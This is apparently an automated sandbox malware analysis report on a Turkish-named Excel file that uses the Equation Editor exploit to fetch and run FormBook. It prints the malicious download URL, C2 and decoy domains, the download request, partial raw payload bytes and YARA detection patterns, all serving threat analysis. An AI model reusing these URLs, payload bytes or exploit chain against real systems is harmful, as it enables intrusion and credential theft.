
Windows Analysis Report
TedarikciSiparisi_83613 .xlsx

Overview

General Information

Sample Name: TedarikciSiparisi_83613 .xlsx
Analysis ID: 626598
MD5: 650bb8e5fe570bde782be21c4e9f421c
SHA1: fd3ffa031546f1dfa7ed884689ca1e85941fca1e
SHA256: 247838308fb5e12a258def82a63e3a752d1536d1771539d63cebcf283b8154b5
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3032 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2584 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2600 cmdline: "C:\Users\Public\vbc.exe" MD5: CE42FE431B88922AB59B6FD880CADCF6)
      • aspnet_compiler.exe (PID: 2336 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 6D0C232D1F4CD357FD7C14ED6FABFA90)
  • cleanup

Malware configuration (FormBook): {"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}
Yara matches (memory dumps)

Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
    • 0x73130:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x734ba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7f1cd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x7ecb9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x7f2cf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x7f447:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x73ed2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x7df34:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x74c4a:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x846bf:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x85762:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
    • 0x815f1:$sqlite3step: 68 34 1C 7B E1
    • 0x81704:$sqlite3step: 68 34 1C 7B E1
    • 0x81620:$sqlite3text: 68 38 2A 90 C5
    • 0x81745:$sqlite3text: 68 38 2A 90 C5
    • 0x81633:$sqlite3blob: 68 53 D8 7F 8C
    • 0x8175b:$sqlite3blob: 68 53 D8 7F 8C

Yara matches (unpacked PEs)

Source: 2.3.EQNEDT32.EXE.6cecd8.0.raw.unpack
Rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7
Description: Detects hard-coded User-Agent string that has been present in several APT37 malware families.
Author: Steve Miller aka @stvemillertime
Strings:
    • 0x1728:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    • 0x1728:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...

    Exploits

    Source: Network Connection | Author: Joe Security | Data: DestinationIp: 180.214.238.224, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2584, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
    Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2584, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
    No Snort rule has matched


    AV Detection

    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}
    Source: TedarikciSiparisi_83613 .xlsx | ReversingLabs: Detection: 34%
    Source: Yara match | File source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: http://180.214.238.224/__cloud_for_file/vbc.exe | Avira URL Cloud: Label: malware
    Source: www.mentalnayaarifmetika.online/ocgr/ | Avira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | ReversingLabs: Detection: 41%
    Source: C:\Users\Public\vbc.exe | ReversingLabs: Detection: 41%
    Source: C:\Users\Public\vbc.exe | Joe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | Joe Sandbox ML: detected

    Exploits

    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 180.214.238.224 Port: 80
    Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb | source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, vbc.exe.2.dr, vbc[1].exe.2.dr
    Source: Binary string: THEDEVILISHERE.pdb | source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB | source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr
    Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll | source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp

    Software Vulnerabilities

    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036306A9 ShellExecuteExW,ExitProcess
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036306C7 ExitProcess
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03630648 URLDownloadToFileW,ShellExecuteExW,ExitProcess
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03630531 URLDownloadToFileW,ShellExecuteExW,ExitProcess
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0363054D URLDownloadToFileW,ShellExecuteExW,ExitProcess
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03630692 ShellExecuteExW,ExitProcess
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036305D7 URLDownloadToFileW,ShellExecuteExW,ExitProcess
    Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 180.214.238.224:80 (listed twice in the report)
    Source: excel.exe | Memory has grown: Private usage: 4MB later: 63MB

    Networking

    Source: Malware configuration extractor | URLs: www.mentalnayaarifmetika.online/ocgr/
    Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
    Source: global traffic | HTTP traffic detected:
        HTTP/1.1 200 OK
        Date: Sat, 14 May 2022 13:14:18 GMT
        Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
        Last-Modified: Fri, 13 May 2022 09:07:10 GMT
        ETag: "38000-5dee0ffdad130"
        Accept-Ranges: bytes
        Content-Length: 229376
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/x-msdownload
        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ba 1f 7e 62 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 76 03 00 00 7c 03 00 00 00 00 00 ca 95 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 95 03 00 57 00 00 00 00 c0 03 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 0c 00 00 00 18 50 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 75 03 00 00 20 00 00 00 76 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 03 00 00 02 00 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 c8 05 00 00 00 c0 03 00 00 06 00 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 95 03 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 50 03 00 d4 44 00 00 03 00 02 00 03 00 00 06
        08 3d 00 00 10 13 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 00 28 0b 00 00 06 00 2a 00 00 00 03 30 09 00 07 00 00 00 00 00 00 00 02 28 3e 00 00 0a 2a 00 13 30 08 00 36 02 00 00 01 00 00 11 2b 07 26 16 28 11 00 00 06 1a 28 11 00 00 06 1e 28 11 00 00 06 3a e9 01 00 00 18 45 01 00 00 00 f6 ff ff ff 17 2d 06 d0 03 00 00 06 26 26 00 17 28 18 00 00 06 20 79 e7 07 00 28 18 00 00 06 25 26 20 7e e7 07 00 28 18 00 00 06 25 26 28 7f 00 00 06 20 81 e7 07 00 28 18 00 00 06 20 88 e7 07 00 28 18 00 00 06 28 80 00 00 06 20 8b e7 07 00 28 18 00 00 06 20 8e e7 07 00 28 18 00 00 06 28 80 00 00 06 20 91 e7 07 00 28 18 00 00 06 20 94 e7 07 00 28 18 00 00 06 25 26 28 80 00 00 06 20 97 e7 07 00 28 18 00 00 06 25 26 20 a0 e7 07 00 28 18 00 00 06 28 80 00 00 06 0a 1f 0c 28 11 00 00 06 28 06 00 00 06 3a 0d 01 00 00 1a 45 01 00 00 00 f6 ff ff ff 26 1f 10 28 11 00 00 06 1f 14 28 11 00 00 06 39 19 01 00 00 26 06 28 a4 00 00 06 0b 1f 18 28 11 00 00 06 28 05 0
    Source: global traffic | HTTP traffic detected:
        GET /__cloud_for_file/vbc.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 180.214.238.224
        Connection: Keep-Alive
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess
    Source: unknown | TCP traffic detected without corresponding DNS query: 180.214.238.224 (this entry is listed 50 times in the report)
    Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.953845845.00000000006F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exe
    Source: EQNEDT32.EXE, 00000002.00000003.953845845.00000000006F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exe95C:
    Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exeX
    Source: EQNEDT32.EXE, 00000002.00000002.956107839.0000000000696000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exehhC:
    Source: EQNEDT32.EXE, 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exej
    Source: EQNEDT32.EXE, 00000002.00000003.953884228.000000000071C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exeu
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DC1A5DE.emf

    E-Banking Fraud

    Source: Yara match | File source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

    System Summary

    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
    Source: 2.3.EQNEDT32.EXE.6cecd8.0.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_003358D3
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E24D0
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E5610
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E0678
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E1CE8
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E1CE7
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E65A0
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E0638
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 77620000 page execute and read and write
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 77740000 page execute and read and write
    Source: C:\Users\Public\vbc.exe | Memory allocated: 77620000 page execute and read and write
    Source: C:\Users\Public\vbc.exe | Memory allocated: 77740000 page execute and read and write
    Source: vbc.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: vbc[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: TedarikciSiparisi_83613 .xlsx | ReversingLabs: Detection: 34%
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$TedarikciSiparisi_83613 .xlsx
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR5F10.tmp
    Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@6/18@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
    Source: C:\Users\Public\vbc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts (listed twice in the report)
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Users\Public\vbc.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb | source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, vbc.exe.2.dr, vbc[1].exe.2.dr
    Source: Binary string: THEDEVILISHERE.pdb | source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB | source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr
    Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll | source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E3AC0 push esp; ret 4_2_002E3AC9
    Source: initial sample | Static PE information: section name: .text entropy: 7.92488075838 (listed twice in the report)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess

    Boot Survival

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exe, Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Evasive API call chain: GetPEB, DecisionNodes, ExitProcess (graph_2-501)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2344, Thread sleep time: -300000s >= -30000s
    Source: C:\Users\Public\vbc.exe TID: 1036, Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\Public\vbc.exe, Thread delayed: delay time: 922337203685477
    Source: C:\Users\Public\vbc.exe, Process information queried: ProcessInformation
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, API call chain: ExitProcess graph end node (graph_2-526)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, API call chain: ExitProcess graph end node (graph_2-550)
    Source: EQNEDT32.EXE, 00000002.00000002.956335622.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: EQNEDT32.EXE, 00000002.00000002.956117653.000000000069D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exe, Process token adjusted: Debug
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_036306C7 mov edx, dword ptr fs:[00000030h] 2_2_036306C7
    Source: C:\Users\Public\vbc.exe, Memory allocated: page read and write | page guard
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Users\Public\vbc.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
